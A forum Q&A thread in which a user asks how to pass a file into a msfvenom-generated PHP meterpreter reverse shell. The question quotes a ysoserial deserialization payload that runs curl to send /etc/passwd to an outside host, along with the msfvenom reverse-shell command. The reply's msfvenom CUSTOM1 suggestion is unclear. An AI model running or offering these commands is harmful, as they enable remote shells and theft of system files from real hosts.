# How to 'path a file' when generate Metasploit shell?

Tags: shell, metasploit

I want to path a file with generate Metasploit shell. It is like this:

```
java -jar ysoserial.jar CommonsCollections1 "curl -X POST -F file=@etc/passwd axample.com" | base64
```

like `-F file` in example, I want to path a file in command:

```
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
```

This is just command I want to path a file. My file is a payload file (etc/payload). I don't know the command for doing this. I tried to find a tutorial, but couldn't.

Comment: What you mean by **path a file** ?

Comment: Drag and Drop For Easy Path Name Entry

Comment: -F file=@etc/passwd  is 'put a file from computer' into command and create shellcode. i want todo the same with metasploit.

Answer (score 0):

As I understand, you are using `msfvenom` tool to generate a Meterpreter *payload* - the program that will run on the target host (in this case it will bring you command shell of the target host).

This payload is a part of Metasploit framework - a predefined program, not your custom script and you want to pass your file to it. If so, it all depends on the Meterpreter's parameters to pass anything to it. But it seems that there is no such option as *just path a some file* in Meterpreter.

In example with `curl` the `-F` option is recognized by cURL application and stands for HTTP Forms posting and directs web server for file uploading with given by property name `file`.

But what *path to file* you want to pass to the Meterpreter payload? What is your final goal? Now it looks like no sense for it.

**UPDATE for you comment**

The `curl` is a different application and they use `-F` option format implemented. In `msfvenom` use to pass variable `CUSTOM1` the following form:

`msfvenom -p <payload> LHOST=<...> LPORT=<...> CUSTOM1=<...> ...`

Comment: Is curl and -F in ax ample can use with metesploit? My goal is comand like example but USE metasploit.